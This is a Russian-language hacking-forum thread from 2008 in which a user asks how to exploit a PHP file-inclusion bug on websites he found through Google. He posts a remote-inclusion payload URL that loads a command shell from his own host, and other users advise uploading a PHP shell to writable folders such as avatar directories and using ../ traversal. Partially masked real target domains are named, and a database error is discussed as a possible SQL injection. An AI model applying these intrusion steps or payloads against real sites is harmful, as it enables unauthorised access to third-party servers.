Не могу обойти фильтрацию php-include
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Не могу обойти фильтрацию php-include - 2008-10-20 23:08:11.480000
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Нашёл сайт с ошибкой php-инклюдинг.
http://test.ru/index.php?page=asd
Вылезло
Warning: include(lib/asd.inc) [function.include]: failed to open stream: No such file or directory in /www/vhosts/test.ru/html/index.php on line 460
Warning: include() [function.include]: Failed opening 'lib/asd.inc' for inclusion (include_path='.:/usr/local/lib/php') in /www/vhosts/test.ru/html/index.php on line 460
Подставил запрос http://kadet.ru/index.php?page=http://lovop.narod.ru/girl.php?cmd=ls
вылезло
Warning: include(lib/http://lovop.narod.ru/girl.php?cmd=ls.inc) [function.include]: failed to open stream: No such file or directory in /www/vhosts/test.ru/html/index.php on line 460
Warning: include() [function.include]: Failed opening 'lib/http://lovop.narod.ru/girl.php?cmd=ls.inc' for inclusion (include_path='.:/usr/local/lib/php') in /www/vhosts/test.ru/html/index.php on line 460
То есть файл подключается из папки lib, как это обойти? Пробывал %00 - не помогло
ps читал http://iz-news.ru/web/195/
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 02:08:44.283333
|
|
|
JenJen
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-13 18:51:01.436666
|
Никак ты не подставишь свой сайт, это только локальный инклуд. Залей любой свой файл на тот сайт и инклудь его. Тем более ты уже знаешь путь к www дире.
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 11:55:36.366666
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
ну даже если ты зальешь файл куда либо ты его все равно не заинклюдишь , если он не лежит в директории lib/
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 19:29:56.323333
|
|
|
JenJen
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-13 18:51:01.436666
|
forint с чего ты взял? А ты знаешь, что есть сиволы переходы вверх по папкам? ../ И если там safe_mode не врублен есть вероятность, что таки сможешь приинклудить.
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:09:11.106666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Как я понял нужно залить php-shell на этот сервак.
Но для этого надо знать путь к директории с правами 777.
Как же я такую найду?
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:11:56.356666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
аватарки и прочее. Думать надо. Кстати, не обязательно 777, достаточно 755
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:39:55.756666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Мне улыбнулась удача?
Можно получить доступ к базе данных?
Думаю что нет так как стоит using password: YES а я пароль не знаю.
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'U331601'@'bravd.store' (using password: YES) in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 48
Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 330
Warning: mysql_errno(): supplied argument is not a valid MySQL-Link resource in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 331
phpBB : Critical Error
Could not connect to the database
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:41:53.086666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
ссылку дай уже, секрет - в личку
ЗЫЖ А это уже SQL-inject
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 21:54:27.290000
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
ORIGINAL: JenJen
forint с чего ты взял? А ты знаешь, что есть сиволы переходы вверх по папкам? ../ И если там safe_mode не врублен есть вероятность, что таки сможешь приинклудить.
да ну.. честно ? и как тут это сделать ???
смотрим сюда - Warning: include(lib/asd.inc)
а потом смотрим на результат попытки инклюда!
Warning: include(lib/http://lovop.narod.ru/girl.php?cmd=ls.inc)
ладно это .inc - это фигня но ,не lib/
то есть грубо говоря он приписывает ВСЕГДА к твоему урлу название директории lib/ в начало.
тут даже etc/passwd не вызвать !!!
quote:
А ты знаешь, что есть сиволы переходы вверх по папкам
ну ка , поделись секретом !!!!
что за символы такие волшебные , которые позволяют при ИНКЛЮДЕ обойти префикс!!??точно сам гари поттер поделился с тобой ими…
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 22:37:46.650000
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
атарки и прочее. Думать надо. Кстати, не обязат quote:
ORIGINAL: Pashkela
ссылку дай уже, секрет - в личку
ЗЫЖ А это уже SQL-inject
тоже мне блин хацкер !!! =)))
первый сайт где php инклюд - hxxp://#####.xpandrally.com/
и вот этот тоже - hхххp://#####kadet.ru
второй где он про sql - hxxp://#####.team-butterfly.org/
вы ребята порой меня убиваете … =)))
я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается..
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 23:15:19.853333
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
quote:
ORIGINAL: forint
я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается..
А зачем узнавать что это за сайты?
Мне же их Гугл выдал, значит всё законно.
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 23:39:12.096666
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
ORIGINAL: lovop
quote:
ORIGINAL: forint
я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается..
А зачем узнавать что это за сайты?
Мне же их Гугл выдал, значит всё законно.
не про законность идёт речь … а о внимательности и реальному соотношению к его статусу на форуме =)
|
|
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-25 04:39:41.463333
|
|
|
kolPeeX
Сообщений: 1456
Оценки: 0
Присоединился: 2007-01-25 14:57:57.683333
|
quote:
ORIGINAL: forint
ну ка , поделись секретом !!!!
что за символы такие волшебные , которые позволяют при ИНКЛЮДЕ обойти префикс!!??точно сам гари поттер поделился с тобой ими…
50$, icq 499083
|
|
|
|
|
|
